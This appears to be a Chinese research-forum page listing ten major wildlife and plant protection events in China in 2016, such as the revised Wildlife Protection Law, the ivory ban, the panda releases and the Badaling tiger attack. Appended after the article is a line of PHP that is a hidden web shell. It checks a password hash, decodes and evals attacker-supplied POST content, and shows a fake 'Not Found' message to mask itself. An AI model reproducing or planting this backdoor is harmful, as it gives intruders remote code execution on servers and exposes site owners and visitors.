科研论坛

首页 > 科研保护 > 科研论坛 >

    2016年中国野生动植物保护十件大事

           1.新修订的《中华人民共和国野生动物保护法》审议通过

      7月2日,新修订的《中华人民共和国野生动物保护法》经第十二届全国人大常委会第二十一次会议通过,于2017年1月1日起开始实施。
      本次修订由国家林业局、农业部提出,于2013年列入了十二届全国人大常委会立法规划,同年启动相关修订工作。修订期间,全国人大环资委、法工委会同国家林业局、农业部等有关部门,赴全国各地进行调研、组织座谈会,广泛听取各方意见和建议,两次向社会公开征求意见,经第十二届全国人大常委会三次审议,7月2日表决通过。
      与1988年出台的原法相比,新法最大变化是将“加强资源保护、积极驯养繁殖、合理开发利用”的保护方针调整为“保护优先、规范利用、严格监管”的原则,并着重围绕“保护优先、规范利用、严格监管”3个方面,对法律条款进行修订。新法新增栖息地、疫源疫病监测防控、抢救性遗传资源、标识、野生动物广告网络交易等内容。
      2.中央深改组审议通过大熊猫、东北虎豹国家公园体制试点方案
      12月5日,习近平总书记主持召开中央全面深化改革小组第三十次会议。《大熊猫国家公园体制试点方案》《东北虎豹国家公园体制试点方案》在此次会议上获审议通过。
      会议指出,开展大熊猫和东北虎豹国家公园体制试点,有利于增强大熊猫、东北虎豹栖息地的联通性、协调性、完整性,推动整体保护、系统修复,实现种群稳定繁衍。要统筹生态保护和经济社会发展、国家公园建设和保护地体系完善,在统一规范管理、建立财政保障、明确产权归属、完善法律制度等方面取得实质性突破。
      3.中国禁止象牙贸易确定“时间表”
      经国务院同意,3月20日,《国家林业局公告(2016年第3号)》宣布,从2016年3月20日起至2019年12月31日止,我国临时禁止进口《濒危野生动植物种国际贸易公约》(以下简称《公约》)生效前所获的象牙及其制品、《公约》生效后所获的非洲象牙雕刻品以及在非洲进行狩猎后获得的狩猎纪念物象牙。象牙文物回流和科研教学、文化交流、公共展示、执法司法等非商业目的需要进口象牙及其制品的情况,不在此次临时禁止进口范围。
      12月29日,国务院办公厅发出《关于有序停止商业性加工销售象牙及制品活动的通知》。《通知》要求,2017年3月31日前先行停止一批象牙定点加工单位和定点销售场所的加工销售象牙及制品活动,2017年12月31日前全面停止。积极引导象牙雕刻技艺转型,文化部门要引导象牙雕刻技艺传承人和相关从业者转型。
      4.中国自然保护区建设迎来60周年
      3月30日,“全国野生动植物保护与自然保护区管理工作会议暨自然保护区建立60周年纪念大会”举办;5月22日,国家林业局、环境保护部等七部门在京联合召开国际生物多样性日暨中国自然保护区发展60周年大会。在贵阳、北京王府井等地,国家林业局野生动植物保护与自然保护区管理司、中国绿色时报社、中国国家地理杂志社、鸟网等部门联合举办“中国自然保护区60周年生态摄影比赛”,举办了“中国自然保护区60年摄影巡回展”,赢得社会广泛关注。
      截至2015年底,林业建立各级各类自然保护区2228处,总面积达1.24亿公顷,林业自然保护区数量、面积均占到全国80%以上,成为全国自然保护区的主体。
      5.打击野生动物非法贸易部际联席会议机制形成
      11月15日,国务院批准,建立由国家林业局牵头、22个部门参加的“打击野生动植物非法贸易部际联席会议制度”,旨在建立健全部门间联动长效机制,多环节强化野生动植物保护执法监管。
      国家林业局将会同成员单位,研究打击野生动植物非法贸易重大问题和总体工作计划,明确分工职责,从栖息地源头到餐馆饭店、交易市场、运输路线、网络及广告等各个环节,形成齐抓共管、协同作战的良好态势,有效阻断野生动物非法交易链,坚决遏制破坏乱捕滥猎滥食野生动物和走私、非法经营野生动物产品的违法犯罪势头。
      6.中国首次当选《CITES公约》缔约方大会副主席国
      9月24日,《濒危野生动植物种国际贸易公约》(CITES)第十七届缔约方大会在南非约翰内斯堡开幕,中国首次当选《CITES公约》缔约方大会副主席国。
      本次会议是《公约》签署43年来参加人数和议案规模最大的一次缔约方大会。来自全球170多个国家的政府、200多个政府间和非政府组织的约3000名代表参加会议,讨论由各缔约方提交的近120项政策性议题,涵盖濒危野生动植物的贸易管制、立法、执法以及发展战略、行政与财政等领域,并审议62项附录修订提案。
      中国政府派出了以国家林业局副局长刘东生为团长,外交部、农业部、海关总署、国家林业局、国家濒危物种进出口管理办公室、国家濒危物种科学委员会等部门以及香港、澳门特别行政区《公约》管理机构组成的政府代表团参加会议。
      9月26日,中国政府代表团举行了“中国履约工作展览”开幕式。
      7.亚洲赏鸟博览会在中国首次举办
      11月12日,第七届亚洲赏鸟博览会和2016年全国暨湖北省野生动物保护宣传月启动仪式同期在湖北京山揭幕。来自22个国家和地区、国内17个省(区、市)的79个环保组织机构的爱鸟人士以及媒体记者数千人云集中国观鸟之乡,共赏珍稀鸟类,一品生态京山,分享观鸟、野鸟保护和自然保育成果。
      此次鸟博会由中国野生动物保护协会、湖北省京山县人民政府、湖北省野生动植物保护协会、寸草心乡村环保促进会共同主办。
      8.七部门联合行动全国“清网”打击野生动物的违法犯罪活动
      10月1日,国家林业局召开电视电话会,对打击乱捕滥猎滥食和非法经营候鸟等野生动物违法犯罪活动做出部署,宣布自2016年10月18日至11月30日,在全国范围内部署开展保护候鸟等野生动物的“清网行动”。11月1日,国家林业局联合网信、公安、交通运输、工商、铁路等七部门发出《关于严厉打击乱捕滥猎滥食和非法经营候鸟等野生动物违法犯罪活动的紧急通知》。
      11月-12月,国家林业局、国家工商行政管理总局联合相关部门共派出6个督导组,前往重要的候鸟集群分布区、主要鸟类迁徙路线区域以及非法经营鸟类严重的地区,对各部门贯彻落实《通知》要求和会议精神情况进行监督检查。
      9.我国首次同时放归两只大熊猫
      10月20日,在四川雅安栗子坪国家级自然保护区,经过培训的大熊猫“华妍”“张梦”被放归自然。在全球,这是首次尝试同时放归2只大熊猫。这也是迄今为止人工圈养放归自然的第六只和第七只大熊猫。此前,科研团队对放归自然成活的5只个体实施追踪监测,定期回捕,目前情况良好。
      2016年,我国大熊猫人工繁育取得新进展,全国共繁育大熊猫40胎64只,成活54只(含境外),全国人工圈养种群总数达到464只,向维持种群高水平遗传多样性的目标继续迈进。
      到2016年底,先后分11批次对25只人工繁育大熊猫进行野化培训。其中,有11只被淘汰,7只被放归野外,还有7只正在培训。今后还将继续扩大大熊猫放归自然的规模,促进野外大熊猫濒危小种群的恢复和发展。
      10.八达岭野生动物园老虎伤人事件引发高度关注
      7月23日,在北京八达岭野生动物园,两名自驾游女游客在猛兽区下车后,被老虎袭击,造成1死1伤。
      事件发生后,延庆区全力组织救治伤员,并责成相关部门组成联合调查组在第一时间对事件原因进行调查。随着时间推进,调查组认定该事件不属于生产安全责任事故,受伤女游客赵女士接受记者面对面采访介绍情况,北京八达岭野生动物园老虎伤人事故完整视频首度曝光,事件当事人表示将起诉动物园并申请提级管辖,事件每一步进展,无不引起公众广泛关注。
      11月,当事人将八达岭野生动物园起诉到延庆法庭,提出丧葬费、死亡赔偿金、精神损害赔偿金等共计154万余元的诉讼请求。此次事件引发人们对人与动物关系的全方位思考。 
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>